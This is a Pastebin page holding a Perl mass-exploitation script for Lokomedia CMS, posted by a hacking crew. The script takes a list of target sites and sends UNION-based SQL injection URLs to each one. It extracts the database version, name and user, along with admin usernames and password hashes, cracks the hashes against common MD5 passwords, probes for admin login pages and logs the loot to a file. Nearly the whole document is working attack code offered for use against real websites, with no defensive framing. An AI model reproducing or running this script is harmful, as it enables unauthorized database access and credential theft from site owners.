API tools faq
paste
Advertisement
Mandra-Crew_MemberZ

Lokomedia CMS Remote SQL Injection

Mandra-Crew_MemberZ
Mar 19th, 2018
409
0
Never
Add comment
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
Perl 15.29 KB | None | 0 0
raw download clone embed print report
  1. # Exploit Title :    Lokomedia CMS Remote SQL Injection Exploit Vulnerability
  2. # Exploit Author :   el ZinDYanII-tN
  3. # TargetS :          list.txt :p
  4. # Tested on :        [ WIN 8.1 ]
  5. # dork :              :p
  6. # fb team page :     http://linkshrink.net/7vjXkA
  7. # fb Author :        http://linkshrink.net/7ta538
  8. # video Proof :      http://linkshrink.net/7ZSPhq
  9. # More Exploit :     http://linkshrink.net/7NyfBE
  10. # team :             mandra crew memberZ
  11. # Date:              17/10/2017
  12. ######################
  13. # Music :            RedStar Radi - Yohka Anna (يحكى أن )
  14. # Discovered by :    el ZinDYanII-tN
  15. # Greetz :           [ Spawn_Z | SerialBack  | pedro vortex | adminet ]
  16. ######################
  17. ######################
  18. # DOWNLOAD TOOL :    http://linkshrink.net/7NyfBE
  19. use LWP::UserAgent;
  20. use HTTP::Request::Common;
  21. use Term::ANSIColor;
  22. use Win32::Console::ANSI;
  23. use HTTP::Request::Common qw(GET);
  24. use LWP::UserAgent;
  25. use WWW::Mechanize;  
  26. use Socket;
  27. use HTTP::Request;
  28. use IO::Select;
  29. use HTTP::Response;
  30. use HTTP::Request::Common qw(POST);
  31. use URI::URL;
  32. use IO::Socket::INET;
  33. $mech = WWW::Mechanize->new(autocheck => 0);
  34. my $ua = LWP::UserAgent->new;
  35. $ua->timeout(10);
  36. my $time    = localtime;
  37. $res="MCMrzlt";if (-e $res){begin();}else{mkdir $res or die "WE CAN NOT CREATE THE BOARD OF DIRECTORS: $res";}
  38. sub begin(){if(@ARGV != 1) { manytofuck(); }else { onetofuck(); }}
  39. sub manytofuck(){if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }system ("title mandra crew web-fucker V2.1");
  40. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
  41. print colored ("                       [ c0d3d bY ManDra creW membere ]                        ",'white on_red'),"\n";print color('reset');
  42. print colored ("                               [ elZinDYanII-tN ]                              ",'white on_red'),"\n";print color('reset');
  43. print colored ("                              [ Version 2.1 baby ]                             ",'white on_red'),"\n";print color('reset');
  44. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";  print color('reset');                                  
  45. print colored ("\n                     ___ ___ _____ _______ __          __                    ",'green on_black'),"\n";print color('reset');
  46. print colored ("                    |   Y   | _   |   _   |  |--.-----|  |_                    ",'green on_black'),"\n";print color('reset');
  47. print colored ("                    |.      |.|   |___|   |  _  |  _  |   _|                   ",'green on_black'),"\n";print color('reset');
  48. print colored ("                    |. |_|  `-|.  |_(__   |_____|_____|____|                   ",'green on_black'),"\n";print color('reset');
  49. print colored ("                    |:  |   | |:  |:  1   |  mandra crew                       ",'green on_black'),"\n";print color('reset');
  50. print colored ("                    |::.|:. | |::.|::.. . |  Loko-fucker                       ",'green on_black'),"\n";print color('reset');
  51. print colored ("                    `--- ---' `---`-------'                                    ",'green on_black'),"\n\n"; print color('reset');                          
  52. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
  53. print colored ("                                  [ thnx f0r ]                                 ",'white on_red'),"\n";print color('reset');
  54. print colored ("               [ Spawn_Z | SerialBack  | pedro vortex | adminet ]              ",'white on_red'),"\n";print color('reset');
  55. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n\n";print color('reset');
  56. print colored ("                       Start At $time                                          ",'white on_black'),"\n";print color('reset');
  57. print "\n\n\n\tPut Ur List Plz : ";
  58. $list=<STDIN>;
  59. print "\n\n";
  60. open (THETARGET, "<$list") || die "[-] Can't open the file";
  61. @TARGETS = <THETARGET>;
  62. close THETARGET;
  63. $link=$#TARGETS + 1;
  64. print color("bold white"), "[+] Total sites : ";
  65. print color("bold red"), "".scalar(@TARGETS)."\n\n";
  66. print color('reset');
  67. OUTER: foreach $site(@TARGETS){
  68. chomp($site);
  69. $a++;
  70. lokomedia();
  71. }}
  72. sub onetofuck() {if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }system ("title mandra crew web-fucker V2.1");
  73. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
  74. print colored ("                       [ c0d3d bY ManDra creW membere ]                        ",'white on_red'),"\n";print color('reset');
  75. print colored ("                               [ elZinDYanII-tN ]                              ",'white on_red'),"\n";print color('reset');
  76. print colored ("                              [ Version 2.1 baby ]                             ",'white on_red'),"\n";print color('reset');
  77. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";  print color('reset');                                  
  78. print colored ("\n                     ___ ___ _____ _______ __          __                    ",'green on_black'),"\n";print color('reset');
  79. print colored ("                    |   Y   | _   |   _   |  |--.-----|  |_                    ",'green on_black'),"\n";print color('reset');
  80. print colored ("                    |.      |.|   |___|   |  _  |  _  |   _|                   ",'green on_black'),"\n";print color('reset');
  81. print colored ("                    |. |_|  `-|.  |_(__   |_____|_____|____|                   ",'green on_black'),"\n";print color('reset');
  82. print colored ("                    |:  |   | |:  |:  1   |  mandra crew                       ",'green on_black'),"\n";print color('reset');
  83. print colored ("                    |::.|:. | |::.|::.. . |  Loko-fucker                       ",'green on_black'),"\n";print color('reset');
  84. print colored ("                    `--- ---' `---`-------'                                    ",'green on_black'),"\n\n"; print color('reset');                          
  85. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
  86. print colored ("                                  [ thnx f0r ]                                 ",'white on_red'),"\n";print color('reset');
  87. print colored ("               [ Spawn_Z | SerialBack  | pedro vortex | adminet ]              ",'white on_red'),"\n";print color('reset');
  88. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n\n";print color('reset');
  89. print colored ("                       Start At $time                                          ",'white on_black'),"\n";print color('reset');
  90.   $site = $ARGV[0];
  91.  if($site !~ /https:\/\// && $site !~ /http:\/\// ) { listt(); };
  92. lokomedia();
  93. }
  94. sub listt() {if ($^O =~ /MSWin32/) {system("cls"); }else { system("clear"); }system ("title mandra crew web-fucker V2.1");
  95. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
  96. print colored ("                       [ c0d3d bY ManDra creW membere ]                        ",'white on_red'),"\n";print color('reset');
  97. print colored ("                               [ elZinDYanII-tN ]                              ",'white on_red'),"\n";print color('reset');
  98. print colored ("                              [ Version 2.1 baby ]                             ",'white on_red'),"\n";print color('reset');
  99. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";  print color('reset');                                  
  100. print colored ("\n                     ___ ___ _____ _______ __          __                    ",'green on_black'),"\n";print color('reset');
  101. print colored ("                    |   Y   | _   |   _   |  |--.-----|  |_                    ",'green on_black'),"\n";print color('reset');
  102. print colored ("                    |.      |.|   |___|   |  _  |  _  |   _|                   ",'green on_black'),"\n";print color('reset');
  103. print colored ("                    |. |_|  `-|.  |_(__   |_____|_____|____|                   ",'green on_black'),"\n";print color('reset');
  104. print colored ("                    |:  |   | |:  |:  1   |  mandra crew                       ",'green on_black'),"\n";print color('reset');
  105. print colored ("                    |::.|:. | |::.|::.. . |  Loko-fucker                       ",'green on_black'),"\n";print color('reset');
  106. print colored ("                    `--- ---' `---`-------'                                    ",'green on_black'),"\n\n"; print color('reset');                          
  107. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n";print color('reset');
  108. print colored ("                                  [ thnx f0r ]                                 ",'white on_red'),"\n";print color('reset');
  109. print colored ("               [ Spawn_Z | SerialBack  | pedro vortex | adminet ]              ",'white on_red'),"\n";print color('reset');
  110. print colored ("+++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++++",'black on_red'),"\n\n";print color('reset');
  111. print colored ("                       Start At $time                                          ",'white on_black'),"\n";print color('reset');
  112. $list=$ARGV[0];
  113. open (THETARGET, "<$list") || die "[-] Can't open the file";
  114. @TARGETS = <THETARGET>;
  115. close THETARGET;
  116. $link=$#TARGETS + 1;
  117. print color("bold white"), "[+] Total sites : ";
  118. print color("bold red"), "".scalar(@TARGETS)."\n\n";
  119. print color('reset');
  120. OUTER: foreach $site(@TARGETS){
  121. chomp($site);
  122. $a++;
  123. lokomedia();
  124. }}
  125. sub lokomedia(){            
  126. print "[+]";
  127. print color("bold white"), "[-lokomedia-]....";
  128. print color('reset');
  129. print " $site\n";
  130. print color('green'),"\n[*]-[*]";
  131. print color('bold green'),"    [Lokomedia DB-scanner V1]\n";
  132. print color('reset');
  133. $lokoversion = "$site/statis--7'union select /*!50000Concat*/(Version())+from+users--+--+kantordesa.html";
  134. $lokodatabase = "$site/statis--7'union select /*!50000Concat*/(Database())+from+users--+--+kantordesa.html";
  135. $lokouserdata = "$site/statis--7'union select /*!50000Concat*/(USER())+from+users--+--+kantordesa.html";
  136. $lokouser = "$site/statis--7'union select /*!50000Concat*/(username)+from+users--+--+kantordesa.html";
  137. $lokopass = "$site/statis--7'union select /*!50000Concat*/(password)+from+users--+--+kantordesa.html";
  138. username();
  139. password();
  140. mysqlversion();
  141. Current_Database();
  142. Current_Username();
  143. lokopanel();
  144. save();
  145. }
  146. sub mysqlversion(){             print color('green'),"  [+] [MySQL Version :    ";
  147. my $checklokoversion = $ua->get("$lokoversion")->content;
  148. if($checklokoversion =~/<meta name="description" content="(.*)">/) {
  149. $dbv=$1;
  150. if($dbv =~ /[a-z]/){
  151. print color('bold white'),"$dbv\n";
  152. print color('reset');
  153. }else {print color('bold red'),"[ERROR]\n";print color('reset');}
  154. }
  155. }
  156. sub Current_Database(){         print color('green'),"  [+] [Current Database : ";
  157. my $checklokodatabase = $ua->get("$lokodatabase")->content;
  158. if($checklokodatabase =~/<meta name="description" content="(.*)">/) {
  159. $db=$1;
  160. print color('bold white'),"$db\n";print color('reset');
  161. }else {print color('bold red'),"[ERROR]\n";print color('reset');}
  162. }
  163. sub Current_Username(){         print color('green'),"  [+] [Current Username : ";
  164. my $checklokouserdata = $ua->get("$lokouserdata")->content;
  165. if($checklokouserdata =~/<meta name="description" content="(.*)">/) {
  166. $udb=$1;
  167. print color('bold white'),"$udb\n";print color('reset');
  168. }else {print color('bold red'),"[ERROR]\n";print color('reset');}
  169. }
  170. sub username(){                 print color('green'),"  [+] [Username :         ";
  171. my $checklokouser = $ua->get("$lokouser")->content;
  172. if($checklokouser =~/<meta name="description" content="(.*)">/) {
  173. $user=$1;
  174. print color('bold white'),"$user\n";print color('reset');
  175. }else {print color('bold red'),"[ERROR]\n";print color('reset');}
  176. }
  177. sub password(){                 print color('green'),"  [+] [Password :         ";
  178. my $checklokopass = $ua->get("$lokopass")->content;
  179. if($checklokopass =~/<meta name="description" content="(.*)">/) {
  180. $hash=$1;
  181. print color('bold white'),"$hash\n";print color('reset');
  182. lokohash();
  183. }else{
  184.  print color('bold red'),"[ERROR]\n";print color('reset');}
  185. }
  186. sub lokohash(){                 print color('green'),"    [-] [hash Password :  ";
  187. $p1="admin123456";
  188. $p2="admin123";
  189. $p3="ADMIN";
  190. $p4="Administrator";
  191. $p5="default";
  192. $p6="pass";
  193. $p7="password";
  194. $p8="test";
  195. $p9="admin";
  196. $p10="demo";
  197. if ($hash =~ /a66abb5684c45962d887564f08346e8d/){
  198. print color('bold white'),"$p1\n";$pass=$p1;}
  199. elsif ($hash =~ /0192023a7bbd73250516f069df18b500/){
  200. print color('bold white'),"$p2\n";$pass=$p2;}
  201. elsif ($hash =~ /73acd9a5972130b75066c82595a1fae3/){
  202. print color('bold white'),"$p3\n";$pass=$p3;}
  203. elsif ($hash =~ /7b7bc2512ee1fedcd76bdc68926d4f7b/){
  204. print color('bold white'),"$p4\n";$pass=$p4;}
  205. elsif ($hash =~ /c21f969b5f03d33d43e04f8f136e7682/){
  206. print color('bold white'),"$p5\n";$pass=$p5;}
  207. elsif ($hash =~ /1a1dc91c907325c69271ddf0c944bc72/){
  208. print color('bold white'),"$p6\n";$pass=$p6;}
  209. elsif ($hash =~ /5f4dcc3b5aa765d61d8327deb882cf99/){
  210. print color('bold white'),"$p7\n";$pass=$p7;}
  211. elsif ($hash =~ /098f6bcd4621d373cade4e832627b4f6/){
  212. print color('bold white'),"$p8\n";$pass=$p8;}
  213. elsif ($hash =~ /21232f297a57a5a743894a0e4a801fc3/){
  214. print color('bold white'),"$p9\n";$pass=$p9;}
  215. elsif ($hash =~ /fe01ce2a7fbac8fafaed7c982a04e229/){
  216. print color('bold white'),"$p10\n";$pass=$p10;}
  217. else{print color('bold red'),"[ERROR]\n";}
  218. }
  219. sub lokopanel(){                print color('green'),"  [+] [Admin Panel :      ";
  220. $ua = LWP::UserAgent->new();
  221. $ua->agent("Mozilla/5.0 (X11; U; Linux i686; en-US; rv:0.9.3) Gecko/20010801");
  222. $ua->timeout(15);
  223. @lokoadminpath =  ('/redaktur','/adminweb','/administrator','/redaktur/index.php','/adminlogin','/admin','/login.php',);
  224. foreach $lap(@lokoadminpath){
  225. $final=$site.$lap;
  226. my $req=HTTP::Request->new(GET=>$final);
  227. my $ua=LWP::UserAgent->new();
  228. $ua->timeout(30);
  229. my $response=$ua->request($req);
  230. if($response->content =~ /Username/ ||
  231. $response->content =~ /Password/ ||
  232. $response->content =~ /username/ ||
  233. $response->content =~ /password/ ||
  234. $response->content =~ /USERNAME/ ||
  235. $response->content =~ /PASSWORD/ ||
  236. $response->content =~ /Senha/ ||
  237. $response->content =~ /senha/ ||
  238. $response->content =~ /Personal/ ||
  239. $response->content =~ /Usuario/ ||
  240. $response->content =~ /Clave/ ||
  241. $response->content =~ /Usager/ ||
  242. $response->content =~ /usager/ ||
  243. $response->content =~ /Sing/ ||
  244. $response->content =~ /passe/ ||
  245. $response->content =~ /P\/W/ ||
  246. $response->content =~ /Admin Password/
  247. ){
  248. print color('bold white'),"$pathone\n";print color('reset');
  249. }else{
  250. print color('bold red'),"[ERROR] $final\n";print color('reset');
  251. }}}
  252. sub save(){
  253. $aa="######################################################################";
  254. open (TEXT, '>>MCMrzlt/loko_db.txt');
  255. print TEXT "$aa\n[*] site : $site\n[+] [MySQL Version] : $dbv\n[+] [Current Database] : $db\n[+] [Current Username] : $udb\n[+] [Username] : $user\n[+] [Password encoded] : $hash\n  [-] [Password Craked] : $pass\n[+] [Admin Panel] : $pathone\n$aa\n";
  256. close (TEXT)
  257. }
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement
Public Pastes
Advertisement
We use cookies for various purposes including analytics. By continuing to use Pastebin, you agree to our use of cookies as described in the Cookies Policy.  OK, I Understand
Not a member of Pastebin yet?
Sign Up, it unlocks many cool features!